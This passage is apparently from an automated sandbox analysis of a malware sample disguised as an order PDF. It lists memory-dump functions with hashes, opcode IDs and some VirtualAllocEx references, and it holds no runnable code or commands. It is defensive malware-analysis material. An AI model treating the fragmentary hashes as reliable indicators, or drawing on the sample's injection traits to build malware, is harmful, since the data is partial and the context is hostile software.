                                                                                • Instruction Fuzzy Hash: 5C2113B18002099FDB10DFAAC544AEEFBF5FF48320F14842AD529A7240DB79A945CFA5
                                                                                Function 0489C3F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0489C45E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 472c1d99259155b0a3f34bf261e9cece6b34e1ba7486e195fa5b8b5b4a660d9c
                                                                                • Instruction ID: ac2151c3612d0b09a79f78097a372d5b6c97e534fb98f4d878e607a7253b372c
                                                                                • Opcode Fuzzy Hash: 472c1d99259155b0a3f34bf261e9cece6b34e1ba7486e195fa5b8b5b4a660d9c
                                                                                • Instruction Fuzzy Hash: E31137719002499FCB10DFAAC844AEFFFF5EF48724F148819E519A7254C779A944CFA1
                                                                                Function 0489C3E9 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0489C45E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242357890.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4890000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 7ca42fca2e363c2086199a76b5877bcbd9a8142f205e75d40ed9e712a16f750c
                                                                                • Instruction ID: 098151c7e8c92d05f9fd4c52a4e31d4a00e3c205cf654cb15868518648160fba
                                                                                • Opcode Fuzzy Hash: 7ca42fca2e363c2086199a76b5877bcbd9a8142f205e75d40ed9e712a16f750c
                                                                                • Instruction Fuzzy Hash: AA1167B59002488FCF10DFAAC944BEEBFF5EF48314F148819E559A7254C739A944CFA0
                                                                                Function 00F2649D Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: rq
                                                                                • API String ID: 0-1470361113
                                                                                • Opcode ID: b55593c583faf543a140e0992a7212ce75770d0e534371d035a2703973827f59
                                                                                • Instruction ID: f3583626415dcb64b1c1247f08be995b78f39a05ce73b4c87764e11f8770f5bd
                                                                                • Opcode Fuzzy Hash: b55593c583faf543a140e0992a7212ce75770d0e534371d035a2703973827f59
                                                                                • Instruction Fuzzy Hash: ED418970D002589FDB14DFA9D490AEEBFF5EF48304F24846AE409AB250DB389945CBA1
                                                                                Function 00F21CB0 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Te]q
                                                                                • API String ID: 0-52440209
                                                                                • Opcode ID: daee889fb7197b7749e3d9522911f936a45d28d83251edbb8d2b7c2c86fe9117
                                                                                • Instruction ID: d4eb97453cd7991e6da98897be70e9796728356ffef08d5182e2eb4d91af7bfd
                                                                                • Opcode Fuzzy Hash: daee889fb7197b7749e3d9522911f936a45d28d83251edbb8d2b7c2c86fe9117
                                                                                • Instruction Fuzzy Hash: 64315979B40124CFCB08DFA8E999BADB7B1BF48715F100069E802DB3A1CB749C41DB44
                                                                                Function 048D8A04 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -
                                                                                • API String ID: 0-2547889144
                                                                                • Opcode ID: 95ca38933597fe7a2321cfbf775b85e663d285106a4fc15cb7c236e936289759
                                                                                • Instruction ID: 6a7210ccd129862d6823b369dc1b66c1a1dc1a9272bf5e62b450f005ebc7fff3
                                                                                • Opcode Fuzzy Hash: 95ca38933597fe7a2321cfbf775b85e663d285106a4fc15cb7c236e936289759
                                                                                • Instruction Fuzzy Hash: 273101B0A02258CFDB64DF18C844BEDB7B1BB45308F0099EAC50AB7240DB71AE85CF01
                                                                                Function 048D84A2 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: &
                                                                                • API String ID: 0-1010288
                                                                                • Opcode ID: e2a0580af54bab59447d55dad38684935901a93bb1025508c6d760d6e204e473
                                                                                • Instruction ID: 8bd0dec4f3d5f798deb822157a176a05a44001c51f4e2d2cea91a24dffe5a074
                                                                                • Opcode Fuzzy Hash: e2a0580af54bab59447d55dad38684935901a93bb1025508c6d760d6e204e473
                                                                                • Instruction Fuzzy Hash: A721F974E01658CFDB64DF68C844BADBBB1BB49304F1085E9951EA7244E731AE81DF41
                                                                                Function 048D9083 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: f0b51268500969c7f87403ceb78d4858f2ee9eae42d80c212c6895cab82ee9e3
                                                                                • Instruction ID: 81973fbc9572688375cc4f2294b5dc8709467a6ee5607599a9e5794e44a4b5d5
                                                                                • Opcode Fuzzy Hash: f0b51268500969c7f87403ceb78d4858f2ee9eae42d80c212c6895cab82ee9e3
                                                                                • Instruction Fuzzy Hash: 3211E0B4A01268CFCB64DF68C984BDDBBB1AB49318F1081D9D60DA7254D771AE81CF00
                                                                                Function 072C151E Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "
                                                                                • API String ID: 0-123907689
                                                                                • Opcode ID: 7901586999c587ee2e131ef4b0706f125db515d92844356cf8ba9f0944f9804f
                                                                                • Instruction ID: 42034b1470fc6658914b9828e93197d327bcde4f8f4edc28734fa9f7cf0e3215
                                                                                • Opcode Fuzzy Hash: 7901586999c587ee2e131ef4b0706f125db515d92844356cf8ba9f0944f9804f
                                                                                • Instruction Fuzzy Hash: B21113B0910229CFCB64CF68DC98BA9B7B1EB49300F5082DAD40AA3240D7709E85CF01
                                                                                Function 048D8C81 Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: A
                                                                                • API String ID: 0-3554254475
                                                                                • Opcode ID: 9d888db76a3ac4c5267d044672e5c1d88b4dae4fe0235fd5849c676acde6a89a
                                                                                • Instruction ID: 62039f0078974ffc350d0cfbb44b2bc0fe32bff79ad55de80fe3e1581fc3702c
                                                                                • Opcode Fuzzy Hash: 9d888db76a3ac4c5267d044672e5c1d88b4dae4fe0235fd5849c676acde6a89a
                                                                                • Instruction Fuzzy Hash: 2B11C574D4112ECFDB64DF68C980BEDBBB1BB48308F1095E9D419A7254E6306E85AF00
                                                                                Function 072C57EE Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2255218343.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_72c0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: I
                                                                                • API String ID: 0-3707901625
                                                                                • Opcode ID: cd4edaf50a7a80bcca1ffdc6af9e2cac21cad65ea7d75f651dcf985efb8f358a
                                                                                • Instruction ID: b6610bef1f162dc69b3632d6e909f503b72ba0aed3fae6c1ffa013b4e9b0aa64
                                                                                • Opcode Fuzzy Hash: cd4edaf50a7a80bcca1ffdc6af9e2cac21cad65ea7d75f651dcf985efb8f358a
                                                                                • Instruction Fuzzy Hash: B7014CB4A10129CFDBA4DF14DC68BE9BBB1EB49305F5195E9941DA3280EBB41EC4DF02
                                                                                Function 048D8488 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: b2c511e0221b9d2e1b972a563bbf2918b4031d16d36e521c8ceab1f8dfe9671a
                                                                                • Instruction ID: 264c65294e9aba934a9c3e75e697ea4f115d211f937c48acc865cec0cd2b0621
                                                                                • Opcode Fuzzy Hash: b2c511e0221b9d2e1b972a563bbf2918b4031d16d36e521c8ceab1f8dfe9671a
                                                                                • Instruction Fuzzy Hash: 3A01BDB4A0222CDFDB29EF58D954BDCBBB1BF09308F104296D60AA3290D7706E81DF40
                                                                                Function 048D853C Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 1
                                                                                • API String ID: 0-2212294583
                                                                                • Opcode ID: 2c1992ae584cbc9fa04ffd8e6a109ddb54bb50de9c7b42e2bf583b085910791c
                                                                                • Instruction ID: bd05def5fe226a60eba5ee5202546729fc32923a506b372fbfd1e3793d2cb495
                                                                                • Opcode Fuzzy Hash: 2c1992ae584cbc9fa04ffd8e6a109ddb54bb50de9c7b42e2bf583b085910791c
                                                                                • Instruction Fuzzy Hash: B1E09A75905559CFCB14DF14C944BD8BBB1AB44309F1484DA8409A7351D3759A86CF00
                                                                                Function 00F22A78 Relevance: .5, Instructions: 533COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa13714e4231495b3c6b268e9277b9d6593767cc4fbac65bb24a9279978dc6c2
                                                                                • Instruction ID: 7416ff46600e75a307a3139a4f7e49bc28642640776b9ac280319d7de14c425b
                                                                                • Opcode Fuzzy Hash: fa13714e4231495b3c6b268e9277b9d6593767cc4fbac65bb24a9279978dc6c2
                                                                                • Instruction Fuzzy Hash: C84214B5A04621CFD305EF0AE688A59BFB1FB41314F96C0D9D0164F26AE37AED85DB40
                                                                                Function 00F229A0 Relevance: .5, Instructions: 484COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b91243e4b35f3b7b334604ba592a15e67b0b9efd20ae5896857e508a9dce773
                                                                                • Instruction ID: be067b84c48cde021aadb2c40021ef07be29e17d82e7998868999608621d98c7
                                                                                • Opcode Fuzzy Hash: 0b91243e4b35f3b7b334604ba592a15e67b0b9efd20ae5896857e508a9dce773
                                                                                • Instruction Fuzzy Hash: 513225B1A04621CFE315EF1AE648A557FE1FB11314F96C0DAD0164F26AE37AE989DF00
                                                                                Function 00F23600 Relevance: .5, Instructions: 472COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c717a2298617db7bfbfcac4f088bd97ca9eb0bb91ce0d60635fedfc68a19e439
                                                                                • Instruction ID: 3acd5a1c34eb757964f4a4d2b546e2fe52af31b508be3149eef1a66645f04488
                                                                                • Opcode Fuzzy Hash: c717a2298617db7bfbfcac4f088bd97ca9eb0bb91ce0d60635fedfc68a19e439
                                                                                • Instruction Fuzzy Hash: 870202B6A042559FCB10CF68D884BAEBBF1EF44300F21856AE446DB251D738EE85EB51
                                                                                Function 048D6220 Relevance: .3, Instructions: 278COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 94b1516ee0b526e0c3aa62043b9bd2de28343c33b057973030c60d795a779c46
                                                                                • Instruction ID: 891a8b6a5a58ad01483ead2befafc9d78bbcfd0f2bc32d2da785410fc8f67813
                                                                                • Opcode Fuzzy Hash: 94b1516ee0b526e0c3aa62043b9bd2de28343c33b057973030c60d795a779c46
                                                                                • Instruction Fuzzy Hash: F4C10370A0121CCFDB94EF68D894BADBBB2FB89314F1085A9D10AA7355EB306D84DF51
                                                                                Function 048D6210 Relevance: .3, Instructions: 269COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cf73d14cd08f67a72974cf4be8130806b32742f6126c586e31480f2b0ea430f6
                                                                                • Instruction ID: 7b1b55d9a4e55574621cc9f0cd8647abaceed2f66ac9099a72e87d30ccef3b7f
                                                                                • Opcode Fuzzy Hash: cf73d14cd08f67a72974cf4be8130806b32742f6126c586e31480f2b0ea430f6
                                                                                • Instruction Fuzzy Hash: E1C11570A01218CFDB94EF68D894BADBBB2FB89314F1085A9D10AB7355EB306D84DF51
                                                                                Function 048D65F0 Relevance: .3, Instructions: 260COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 02d468b03d545b4a47d528567a5e0e2f2e08d5541e5f4fdd588cb4eab2fc834d
                                                                                • Instruction ID: 5b44d467d30679f826f30ad680543024d777c41ac1d67dac686a06a06206f25e
                                                                                • Opcode Fuzzy Hash: 02d468b03d545b4a47d528567a5e0e2f2e08d5541e5f4fdd588cb4eab2fc834d
                                                                                • Instruction Fuzzy Hash: F1C10370A01218CFDB94EF68D854BADBBF2FB89314F1085A9D50AA7355EB30AD84CF51
                                                                                Function 048D64E0 Relevance: .2, Instructions: 250COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d0582b7f976657fcfa6a4dc76aad3d8cae687b2063e50d2c677874902d9ae05
                                                                                • Instruction ID: 3a9aadcdd090f6351b8833c68d3e48046f5cdaf9b8631ac7ae4bc8762e126bfe
                                                                                • Opcode Fuzzy Hash: 4d0582b7f976657fcfa6a4dc76aad3d8cae687b2063e50d2c677874902d9ae05
                                                                                • Instruction Fuzzy Hash: FFC10570A0121CCFDB94EF68D854BADBBB2FB89314F1085A9D10AA7355EB30AD84DF11
                                                                                Function 00F2143B Relevance: .2, Instructions: 234COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a67687ef41836b468170bc76223b20c0cf17eca56ef3662e20897573a6ea61f
                                                                                • Instruction ID: ae8785e1862e15cd41552152489d0b1a76885c46965ea8ea010b91b640512e82
                                                                                • Opcode Fuzzy Hash: 3a67687ef41836b468170bc76223b20c0cf17eca56ef3662e20897573a6ea61f
                                                                                • Instruction Fuzzy Hash: F6815232A042918FCB16DB78E8543AA7BB2FFA6310F1845EAC407CB295D734DC41E785
                                                                                Function 00F264F8 Relevance: .2, Instructions: 226COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ada2fdee3bee4b7a42afc51121cedfb9fea7b85931c7cd6f57831d1afc5e9de5
                                                                                • Instruction ID: ed45dc2bc55a4b0fc7c51735a06a9b7b49c32998cabcbd6beccab4af463a84d3
                                                                                • Opcode Fuzzy Hash: ada2fdee3bee4b7a42afc51121cedfb9fea7b85931c7cd6f57831d1afc5e9de5
                                                                                • Instruction Fuzzy Hash: C8315AB1D002589FDB14CFA9D490AEEBFF2AF48354F248069E419AB350DB789945DFA0
                                                                                Function 048D7B9B Relevance: .2, Instructions: 174COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3a002b906eb37dd930c613ec22483f6eb7833303792edcb425a18dd7d40e374b
                                                                                • Instruction ID: fce5f83c6475bf631f88ca48c370db89ddf0b764fa721c994df485760520ab71
                                                                                • Opcode Fuzzy Hash: 3a002b906eb37dd930c613ec22483f6eb7833303792edcb425a18dd7d40e374b
                                                                                • Instruction Fuzzy Hash: 457126B4A0521CCFCB45DFA8C844BADBBF2FB49304F1085A9E50AA7359D738A945DF11
                                                                                Function 048D7C5E Relevance: .2, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa836ce36ef98f12493de39e292bffa0c23511d1fc27924975fb51434c15c51d
                                                                                • Instruction ID: 111602f8b8f36ff3c094847c2e732e4f9802366e1f249ccebe550e1a97b22c8f
                                                                                • Opcode Fuzzy Hash: fa836ce36ef98f12493de39e292bffa0c23511d1fc27924975fb51434c15c51d
                                                                                • Instruction Fuzzy Hash: F57113B4A01218CFDB45DFA8D844BADBBF2FB49304F1085A9E50AA7358DB38AD45DF11
                                                                                Function 048D7D91 Relevance: .2, Instructions: 156COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2810def55fc34e1d561ba55c1b45732b83fd0d8c66eef650757ba88d54b62e88
                                                                                • Instruction ID: 1dadfbf1380dc3edb2a5a7cfe17f7cb714769fcb9a33e8b306240b2a9d2bda6b
                                                                                • Opcode Fuzzy Hash: 2810def55fc34e1d561ba55c1b45732b83fd0d8c66eef650757ba88d54b62e88
                                                                                • Instruction Fuzzy Hash: 156108B4A0521CDFCB45DFA8C848BADBBF2FB49304F108599E50AA7358DB38A945DF11
                                                                                Function 00F23878 Relevance: .1, Instructions: 130COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 015cd8c7e8a5a22a1335bd96c70645572b68d6ba19b9e90f3e96fa566949ef93
                                                                                • Instruction ID: 298f0ef5210594674910231dc64e78304d3b61c54b6999bf5e34b983204f3d60
                                                                                • Opcode Fuzzy Hash: 015cd8c7e8a5a22a1335bd96c70645572b68d6ba19b9e90f3e96fa566949ef93
                                                                                • Instruction Fuzzy Hash: 97513CB6A04619DFCB14CF69D444AAAB7F1FF48310F20892AE546DB320D338EA45DF51
                                                                                Function 048D7D2D Relevance: .1, Instructions: 128COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2242781907.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_48d0000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 79ef4d4331bfaee1bc8f380c4e0f0bccf47cdaa83bf1eeee1ce2418044387421
                                                                                • Instruction ID: ad7cae39f3bca31c9c4d5e1d8f64ebd496035d1453053b0ba6b105bad422b6ba
                                                                                • Opcode Fuzzy Hash: 79ef4d4331bfaee1bc8f380c4e0f0bccf47cdaa83bf1eeee1ce2418044387421
                                                                                • Instruction Fuzzy Hash: 565115B4A0521CDFCB45DFA9C844BADBBF2FB49304F108569E50AA7358E738A945DF01
                                                                                Function 00F21F38 Relevance: .1, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c7fc3e84111305d7f5fbe3da66f83db14892b1f401ce33ae7eee2a7bb8b90cc
                                                                                • Instruction ID: 7423ab82ca1ad214298525bc70530356b25d9fee9ee085ed8be96c8b29772965
                                                                                • Opcode Fuzzy Hash: 8c7fc3e84111305d7f5fbe3da66f83db14892b1f401ce33ae7eee2a7bb8b90cc
                                                                                • Instruction Fuzzy Hash: 76411231F002299FCB58DB28A5106BF77A2BBD4310B24C969D5158B298EF34DC42E7C1
                                                                                Function 00F23CEB Relevance: .1, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2c9393ab005847228cb31d7786655121bfd889ab4178b9129f417836b9d051dc
                                                                                • Instruction ID: 8dfe91207305402026cbc3a1189c13b1bc8549ffcb20362e451736c9d82a007d
                                                                                • Opcode Fuzzy Hash: 2c9393ab005847228cb31d7786655121bfd889ab4178b9129f417836b9d051dc
                                                                                • Instruction Fuzzy Hash: 84418372A0416DDFCB10CF68E881B7EBBB2FF89300F614469E9129B251C3389E41EB51
                                                                                Function 00F2DCA0 Relevance: .1, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3fbed2b8d6a062204e9ca231cf53428d69bc44c98bedb3a5c0b8f6bd61b56d7c
                                                                                • Instruction ID: 5c7daf03bc8e4cd894659ff9e4e306137d9496e763eb1727294165e1a0b0f27c
                                                                                • Opcode Fuzzy Hash: 3fbed2b8d6a062204e9ca231cf53428d69bc44c98bedb3a5c0b8f6bd61b56d7c
                                                                                • Instruction Fuzzy Hash: F541BDB0D097988FCB41DF68D8587ADBFF1EF46300F5484AAD044AB292D7784A48DF52
                                                                                Function 00F20DE0 Relevance: .1, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2217890023.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_f20000_Order88983273293729387293828PDF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b02d866a00e378b151312e5ca15d96b483d7f06b818ed75c1c79c0287866e78b
                                                                                • Instruction ID: a94665a3b1ac0ec96ae8ede5c4469fb74b43e2ff86be05528c85af671dadfea8
